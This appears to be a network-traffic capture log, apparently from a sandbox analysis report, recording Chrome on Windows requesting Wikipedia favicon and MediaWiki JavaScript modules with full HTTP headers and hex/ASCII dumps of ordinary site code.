                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC938INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Mon, 06 Jan 2025 22:53:38 GMT
                                                                                                                                                                                                                                      expires: Tue, 06 Jan 2026 12:11:05 GMT
                                                                                                                                                                                                                                      cache-control: max-age=31536000
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      etag: W/"aae-62309f0dda7c0"
                                                                                                                                                                                                                                      last-modified: Thu, 26 Sep 2024 18:31:03 GMT
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/vnd.microsoft.icon
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      age: 68356
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/2760507
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 2734
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC2734INData Raw: 00 00 01 00 03 00 30 30 10 00 01 00 04 00 68 06 00 00 36 00 00 00 20 20 10 00 01 00 04 00 e8 02 00 00 9e 06 00 00 10 10 10 00 01 00 04 00 28 01 00 00 86 09 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 04 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 01 01 01 00 17 17 17 00 30 30 30 00 47 47 47 00 58 58 58 00 67 67 67 00 76 76 76 00 87 87 87 00 95 95 95 00 a9 a9 a9 00 b7 b7 b7 00 c7 c7 c7 00 d7 d7 d7 00 e8 e8 e8 00 fe fe fe 00 00 00 00 00 ff ff ff fe ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ef ff ff ff ff ff ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ff ff ff fe ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ef ff ff ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ff fe
                                                                                                                                                                                                                                      Data Ascii: 00h6 ((0`000GGGXXXgggvvv


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      68192.168.2.1649796185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC1607OUTGET /w/load.php?lang=en&modules=ext.centralNotice.choiceData%2Cdisplay%2CgeoIP%2CimpressionDiet%2CkvStore%2ClegacySupport%2CstartUp%7Cext.centralauth.ForeignApi%2Ccentralautologin%7Cext.checkUser.clientHints%7Cext.cite.ux-enhancements%7Cext.cx.eventlogging.campaigns%7Cext.cx.model%7Cext.cx.uls.quick.actions%7Cext.echo.centralauth%7Cext.eventLogging%2CnavigationTiming%2Cpopups%2CwikimediaEvents%7Cext.growthExperiments.SuggestedEditSession%7Cext.uls.common%2Cinterface%2Cpreferences%2Cwebfonts%7Cext.urlShortener.toolbar%7Cjquery%2Coojs%2Csite%7Cjquery.client%2CmakeCollapsible%2CtextSelection%7Cjquery.uls.data%7Cmediawiki.ForeignApi%2CString%2CTitle%2CUri%2Capi%2Cbase%2Ccldr%2Ccookie%2Cexperiments%2CjqueryMsg%2Clanguage%2Crouter%2Cstorage%2Ctoc%2Cuser%2Cutil%2CvisibleTimeout%7Cmediawiki.ForeignApi.core%7Cmediawiki.editfont.styles%7Cmediawiki.libs.pluralruleparser%7Cmediawiki.page.ready%7Cmediawiki.page.watch.ajax%7Cmmv.bootstrap%2Ccodex%7Cmw.cx.SiteMapper%7Coojs-ui.styles.icons-interactions%7Cskins.vector.clientP [TRUNCATED]
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC2451INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 00:04:23 GMT
                                                                                                                                                                                                                                      server: mw-web.eqiad.main-5b5448fd78-tvq8z
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      expires: Thu, 06 Feb 2025 00:04:23 GMT
                                                                                                                                                                                                                                      sourcemap: /w/load.php?lang=en&modules=ext.centralNotice.choiceData%2Cdisplay%2CgeoIP%2CimpressionDiet%2CkvStore%2ClegacySupport%2CstartUp%7Cext.centralauth.ForeignApi%2Ccentralautologin%7Cext.checkUser.clientHints%7Cext.cite.ux-enhancements%7Cext.cx.eventlogging.campaigns%7Cext.cx.model%7Cext.cx.uls.quick.actions%7Cext.echo.centralauth%7Cext.eventLogging%2CnavigationTiming%2Cpopups%2CwikimediaEvents%7Cext.growthExperiments.SuggestedEditSession%7Cext.uls.common%2Cinterface%2Cpreferences%2Cwebfonts%7Cext.urlShortener.toolbar%7Cjquery%2Coojs%2Csite%7Cjquery.client%2CmakeCollapsible%2CtextSelection%7Cjquery.uls.data%7Cmediawiki.ForeignApi%2CString%2CTitle%2CUri%2Capi%2Cbase%2Ccldr%2Ccookie%2Cexperiments%2CjqueryMsg%2Clanguage%2Crouter%2Cstorage%2Ctoc%2Cuser%2Cutil%2CvisibleTimeout%7Cmediawiki.ForeignApi.core%7Cmediawiki.editfont.styles%7Cmediawiki.libs.pluralruleparser%7Cmediawiki.page.ready%7Cmediawiki.page.watch.ajax%7Cmmv.bootstrap%2Ccodex%7Cmw.cx.SiteMapper%7Coojs-ui.styles.icons-interactions%7Cskins.vector. [TRUNCATED]
                                                                                                                                                                                                                                      link: </static/images/project-logos/enwiki.png>;rel=preload;as=image;media=not all and (min-resolution: 1.5dppx),</static/images/project-logos/enwiki-1.5x.png>;rel=preload;as=image;media=(min-resolution: 1.5dppx) and (max-resolution: 1.999999dppx),</static/images/project-logos/enwiki-2x.png>;rel=preload;as=image;media=(min-resolution: 2dppx)
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      etag: W/"5bkcg"
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 miss, cp3072 hit/27902
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 816035
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC12340INData Raw: 6d 77 2e 6c 6f 61 64 65 72 2e 69 6d 70 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 65 78 74 2e 63 65 6e 74 72 61 6c 4e 6f 74 69 63 65 2e 63 68 6f 69 63 65 44 61 74 61 40 61 30 79 68 75 22 2c 66 75 6e 63 74 69 6f 6e 28 24 2c 6a 51 75 65 72 79 2c 72 65 71 75 69 72 65 2c 6d 6f 64 75 6c 65 29 7b 6d 77 2e 63 65 6e 74 72 61 6c 4e 6f 74 69 63 65 3d 28 6d 77 2e 63 65 6e 74 72 61 6c 4e 6f 74 69 63 65 7c 7c 7b 7d 29 3b 6d 77 2e 63 65 6e 74 72 61 6c 4e 6f 74 69 63 65 2e 63 68 6f 69 63 65 44 61 74 61 3d 5b 7b 22 6e 61 6d 65 22 3a 22 43 32 34 5f 57 4d 44 45 5f 44 65 73 6b 74 6f 70 5f 45 4e 5f 74 79 22 2c 22 73 74 61 72 74 22 3a 31 37 33 35 38 32 32 38 30 30 2c 22 65 6e 64 22 3a 31 37 33 36 39 38 32 30 30 30 2c 22 70 72 65 66 65 72 72 65 64 22 3a 32
                                                                                                                                                                                                                                      Data Ascii: mw.loader.impl(function(){return["ext.centralNotice.choiceData@a0yhu",function($,jQuery,require,module){mw.centralNotice=(mw.centralNotice||{});mw.centralNotice.choiceData=[{"name":"C24_WMDE_Desktop_EN_ty","start":1735822800,"end":1736982000,"preferred":2
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC16320INData Raw: 42 61 6e 6e 65 72 53 68 6f 77 6e 28 29 3b 7d 70 72 6f 63 65 73 73 41 66 74 65 72 42 61 6e 6e 65 72 46 65 74 63 68 28 29 3b 7d 2c 72 65 63 6f 72 64 49 6d 70 72 65 73 73 69 6f 6e 44 65 6c 61 79 50 72 6f 6d 69 73 65 73 3a 5b 5d 2c 72 65 63 6f 72 64 49 6d 70 72 65 73 73 69 6f 6e 44 65 66 65 72 72 65 64 4f 62 6a 3a 6e 75 6c 6c 2c 69 6e 74 65 72 6e 61 6c 3a 7b 7d 2c 73 65 74 42 61 6e 6e 65 72 73 4e 6f 74 47 75 61 72 61 6e 74 65 65 64 54 6f 44 69 73 70 6c 61 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6e 2e 69 6e 74 65 72 6e 61 6c 2e 73 74 61 74 65 2e 73 65 74 42 61 6e 6e 65 72 73 4e 6f 74 47 75 61 72 61 6e 74 65 65 64 54 6f 44 69 73 70 6c 61 79 28 29 3b 7d 2c 66 61 69 6c 43 61 6d 70 61 69 67 6e 3a 66 75 6e 63 74 69 6f 6e 28 72 65 61 73 6f 6e 29 7b 63 6e 2e 69 6e
                                                                                                                                                                                                                                      Data Ascii: BannerShown();}processAfterBannerFetch();},recordImpressionDelayPromises:[],recordImpressionDeferredObj:null,internal:{},setBannersNotGuaranteedToDisplay:function(){cn.internal.state.setBannersNotGuaranteedToDisplay();},failCampaign:function(reason){cn.in
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC4108INData Raw: 61 72 20 69 2c 63 61 6d 70 61 69 67 6e 2c 6e 6f 77 3d 6e 65 77 20 44 61 74 65 28 29 2c 63 61 6d 70 61 69 67 6e 45 6e 64 44 61 74 65 50 6c 75 73 4c 65 65 77 61 79 3b 66 6f 72 28 69 3d 30 3b 69 3c 63 68 6f 69 63 65 44 61 74 61 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 63 61 6d 70 61 69 67 6e 3d 63 68 6f 69 63 65 44 61 74 61 5b 69 5d 3b 63 61 6d 70 61 69 67 6e 45 6e 64 44 61 74 65 50 6c 75 73 4c 65 65 77 61 79 3d 6e 65 77 20 44 61 74 65 28 29 3b 63 61 6d 70 61 69 67 6e 45 6e 64 44 61 74 65 50 6c 75 73 4c 65 65 77 61 79 2e 73 65 74 54 69 6d 65 28 28 63 61 6d 70 61 69 67 6e 2e 65 6e 64 2a 31 30 30 30 29 2b 28 43 41 4d 50 41 49 47 4e 5f 53 54 41 4c 45 4e 45 53 53 5f 4c 45 45 57 41 59 2a 36 30 30 30 30 29 29 3b 69 66 28 63 61 6d 70 61 69 67 6e 45 6e 64 44 61 74 65
                                                                                                                                                                                                                                      Data Ascii: ar i,campaign,now=new Date(),campaignEndDatePlusLeeway;for(i=0;i<choiceData.length;i++){campaign=choiceData[i];campaignEndDatePlusLeeway=new Date();campaignEndDatePlusLeeway.setTime((campaign.end*1000)+(CAMPAIGN_STALENESS_LEEWAY*60000));if(campaignEndDate
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC16320INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 72 69 65 76 65 50 72 6f 63 65 73 73 41 6e 64 47 65 74 28 29 3b 7d 2c 0a 67 65 74 42 75 63 6b 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 75 63 6b 65 74 73 5b 63 61 6d 70 61 69 67 6e 2e 6e 61 6d 65 5d 2e 76 61 6c 3b 7d 2c 67 65 74 52 65 64 75 63 65 64 42 75 63 6b 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 75 63 6b 65 74 65 72 2e 67 65 74 42 75 63 6b 65 74 28 29 25 63 61 6d 70 61 69 67 6e 2e 62 75 63 6b 65 74 5f 63 6f 75 6e 74 3b 7d 2c 73 65 74 42 75 63 6b 65 74 3a 66 75 6e 63 74 69 6f 6e 28 76 61 6c 29 7b 62 75 63 6b 65 74 73 5b 63 61 6d 70 61 69 67 6e 2e 6e 61 6d 65 5d 2e 76 61 6c 3d 76 61 6c 3b 73 74 6f 72 65 42 75 63 6b 65 74 73 28 29 3b 7d 7d 3b 7d 28 29 29 3b 0a 7d
                                                                                                                                                                                                                                      Data Ascii: function(){retrieveProcessAndGet();},getBucket:function(){return buckets[campaign.name].val;},getReducedBucket:function(){return bucketer.getBucket()%campaign.bucket_count;},setBucket:function(val){buckets[campaign.name].val=val;storeBuckets();}};}());}
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC16320INData Raw: 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 27 3b 27 29 2c 69 2c 6d 61 74 63 68 65 73 2c 72 3d 6e 65 77 20 52 65 67 45 78 70 28 27 5e 27 2b 50 52 45 46 49 58 5f 41 4e 44 5f 53 45 50 41 52 41 54 4f 52 5f 49 4e 5f 43 4f 4f 4b 49 45 53 2b 27 5b 5e 3d 5d 2a 28 3f 3d 3d 29 27 29 3b 66 6f 72 28 69 3d 30 3b 69 3c 63 6f 6f 6b 69 65 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 6d 61 74 63 68 65 73 3d 63 6f 6f 6b 69 65 73 5b 69 5d 2e 74 72 69 6d 28 29 2e 6d 61 74 63 68 28 72 29 3b 69 66 28 6d 61 74 63 68 65 73 29 7b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 6d 61 74 63 68 65 73 5b 30 5d 2b 27 3d 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 20 4a 61 6e 20 31 39 37 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 3b 20 70 61 74 68 3d 2f 27 3b 7d 7d 7d
                                                                                                                                                                                                                                      Data Ascii: ument.cookie.split(';'),i,matches,r=new RegExp('^'+PREFIX_AND_SEPARATOR_IN_COOKIES+'[^=]*(?==)');for(i=0;i<cookies.length;i++){matches=cookies[i].trim().match(r);if(matches){document.cookie=matches[0]+'=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/';}}}
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC128INData Raw: 6f 6e 3a 27 61 64 64 27 2c 74 65 78 74 3a 6d 77 2e 6d 73 67 28 27 63 78 2d 75 6c 73 2d 74 72 61 6e 73 6c 61 74 65 2d 70 61 67 65 2d 71 75 69 63 6b 2d 61 63 74 69 6f 6e 2d 6c 61 62 65 6c 27 29 2c 68 72 65 66 3a 63 78 45 6e 74 72 79 70 6f 69 6e 74 55 72 6c 7d 3b 6d 77 2e 75 6c 73 2e 41 63 74 69 6f 6e 73 4d 65 6e 75 49 74 65 6d 73 52 65 67 69 73 74 72 79 2e 72 65 67 69 73 74 65 72 28
                                                                                                                                                                                                                                      Data Ascii: on:'add',text:mw.msg('cx-uls-translate-page-quick-action-label'),href:cxEntrypointUrl};mw.uls.ActionsMenuItemsRegistry.register(
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC16320INData Raw: 74 72 61 6e 73 6c 61 74 65 41 63 74 69 6f 6e 49 74 65 6d 29 3b 7d 28 29 29 3b 0a 7d 7d 7d 2c 7b 7d 2c 7b 22 63 78 2d 75 6c 73 2d 74 72 61 6e 73 6c 61 74 65 2d 70 61 67 65 2d 71 75 69 63 6b 2d 61 63 74 69 6f 6e 2d 6c 61 62 65 6c 22 3a 22 54 72 61 6e 73 6c 61 74 65 20 74 68 69 73 20 70 61 67 65 22 7d 5d 3b 7d 29 3b 0a 6d 77 2e 6c 6f 61 64 65 72 2e 69 6d 70 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 65 78 74 2e 65 63 68 6f 2e 63 65 6e 74 72 61 6c 61 75 74 68 40 31 38 6d 61 38 22 2c 7b 22 6d 61 69 6e 22 3a 22 65 78 74 2e 65 63 68 6f 2e 63 65 6e 74 72 61 6c 61 75 74 68 2e 6a 73 22 2c 22 66 69 6c 65 73 22 3a 7b 22 65 78 74 2e 65 63 68 6f 2e 63 65 6e 74 72 61 6c 61 75 74 68 2e 6a 73 22 3a 66 75 6e 63 74 69 6f 6e 28 72 65 71 75 69 72 65 2c 6d
                                                                                                                                                                                                                                      Data Ascii: translateActionItem);}());}}},{},{"cx-uls-translate-page-quick-action-label":"Translate this page"}];});mw.loader.impl(function(){return["ext.echo.centralauth@18ma8",{"main":"ext.echo.centralauth.js","files":{"ext.echo.centralauth.js":function(require,m
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC16320INData Raw: 77 73 69 6e 67 5f 73 65 73 73 69 6f 6e 5f 74 6f 6b 65 6e 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 6e 61 6d 65 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 69 73 5f 62 6f 74 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 69 73 5f 6c 6f 67 67 65 64 5f 69 6e 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 65 64 69 74 5f 63 6f 75 6e 74 5f 62 75 63 6b 65 74 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 67 72 6f 75 70 73 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 72 65 67 69 73 74 72 61 74 69 6f 6e 5f 64 74 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 69 73 5f 74 65 6d 70 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 6c 61 6e 67 75 61 67 65 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 6c 61 6e 67 75 61 67 65 5f 76 61 72 69 61 6e 74 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 70 61 67 65 76 69 65 77 5f 69 64 22 5d 7d 7d
                                                                                                                                                                                                                                      Data Ascii: wsing_session_token","performer_name","performer_is_bot","performer_is_logged_in","performer_edit_count_bucket","performer_groups","performer_registration_dt","performer_is_temp","performer_language","performer_language_variant","performer_pageview_id"]}}
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC128INData Raw: 6f 64 75 6c 65 2c 65 78 70 6f 72 74 73 29 7b 66 75 6e 63 74 69 6f 6e 20 69 73 56 61 6c 69 64 53 61 6d 70 6c 65 28 73 61 6d 70 6c 65 29 7b 72 65 74 75 72 6e 21 21 28 73 61 6d 70 6c 65 26 26 73 61 6d 70 6c 65 2e 75 6e 69 74 26 26 73 61 6d 70 6c 65 2e 72 61 74 65 26 26 73 61 6d 70 6c 65 2e 72 61 74 65 3e 3d 30 26 26 73 61 6d 70 6c 65 2e 72 61 74 65 3c 3d 31 29 3b 7d 6d 6f 64 75 6c 65
                                                                                                                                                                                                                                      Data Ascii: odule,exports){function isValidSample(sample){return!!(sample&&sample.unit&&sample.rate&&sample.rate>=0&&sample.rate<=1);}module
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC16320INData Raw: 2e 65 78 70 6f 72 74 73 3d 7b 69 73 56 61 6c 69 64 53 61 6d 70 6c 65 3a 69 73 56 61 6c 69 64 53 61 6d 70 6c 65 7d 3b 0a 7d 2c 22 65 78 74 2e 65 76 65 6e 74 4c 6f 67 67 69 6e 67 2f 4d 65 64 69 61 57 69 6b 69 4d 65 74 72 69 63 73 43 6c 69 65 6e 74 49 6e 74 65 67 72 61 74 69 6f 6e 2e 6a 73 22 3a 66 75 6e 63 74 69 6f 6e 28 72 65 71 75 69 72 65 2c 6d 6f 64 75 6c 65 2c 65 78 70 6f 72 74 73 29 7b 63 6f 6e 73 74 20 63 3d 6d 77 2e 63 6f 6e 66 69 67 2e 67 65 74 2e 62 69 6e 64 28 6d 77 2e 63 6f 6e 66 69 67 29 3b 6c 65 74 20 63 6f 6e 74 65 78 74 41 74 74 72 69 62 75 74 65 73 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 4d 65 64 69 61 57 69 6b 69 4d 65 74 72 69 63 73 43 6c 69 65 6e 74 49 6e 74 65 67 72 61 74 69 6f 6e 28 29 7b 7d 4d 65 64 69 61 57 69 6b 69 4d 65 74 72
                                                                                                                                                                                                                                      Data Ascii: .exports={isValidSample:isValidSample};},"ext.eventLogging/MediaWikiMetricsClientIntegration.js":function(require,module,exports){const c=mw.config.get.bind(mw.config);let contextAttributes=null;function MediaWikiMetricsClientIntegration(){}MediaWikiMetr


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      69192.168.2.1649799185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC808OUTGET /w/load.php?lang=en&modules=ext.cite.referencePreviews%7Cext.math.popup%7Cext.popups.main&skin=vector-2022&version=1qfqi HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC1081INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 08:29:28 GMT
                                                                                                                                                                                                                                      etag: W/"1qfqi"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 09:30:51 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      sourcemap: /w/load.php?lang=en&modules=ext.cite.referencePreviews%7Cext.math.popup%7Cext.popups.main&skin=vector-2022&sourcemap=1&version=1qfqi
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/219915
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 122202
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC13714INData Raw: 6d 77 2e 6c 6f 61 64 65 72 2e 69 6d 70 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 65 78 74 2e 63 69 74 65 2e 72 65 66 65 72 65 6e 63 65 50 72 65 76 69 65 77 73 40 31 30 64 31 63 22 2c 7b 22 6d 61 69 6e 22 3a 22 69 6e 64 65 78 2e 6a 73 22 2c 22 66 69 6c 65 73 22 3a 7b 22 69 6e 64 65 78 2e 6a 73 22 3a 66 75 6e 63 74 69 6f 6e 28 72 65 71 75 69 72 65 2c 6d 6f 64 75 6c 65 2c 65 78 70 6f 72 74 73 29 7b 63 6f 6e 73 74 20 69 73 52 65 66 65 72 65 6e 63 65 50 72 65 76 69 65 77 73 45 6e 61 62 6c 65 64 3d 72 65 71 75 69 72 65 28 27 2e 2f 69 73 52 65 66 65 72 65 6e 63 65 50 72 65 76 69 65 77 73 45 6e 61 62 6c 65 64 2e 6a 73 27 29 3b 63 6f 6e 73 74 7b 69 6e 69 74 52 65 66 65 72 65 6e 63 65 50 72 65 76 69 65 77 73 49 6e 73 74 72 75 6d 65 6e 74 61 74
                                                                                                                                                                                                                                      Data Ascii: mw.loader.impl(function(){return["ext.cite.referencePreviews@10d1c",{"main":"index.js","files":{"index.js":function(require,module,exports){const isReferencePreviewsEnabled=require('./isReferencePreviewsEnabled.js');const{initReferencePreviewsInstrumentat
